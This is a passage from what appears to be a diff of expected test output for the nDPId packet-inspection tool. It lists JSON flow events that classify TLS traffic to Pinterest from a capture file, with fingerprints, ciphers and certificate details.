o.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinte
rest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinter
est.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinte
rest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 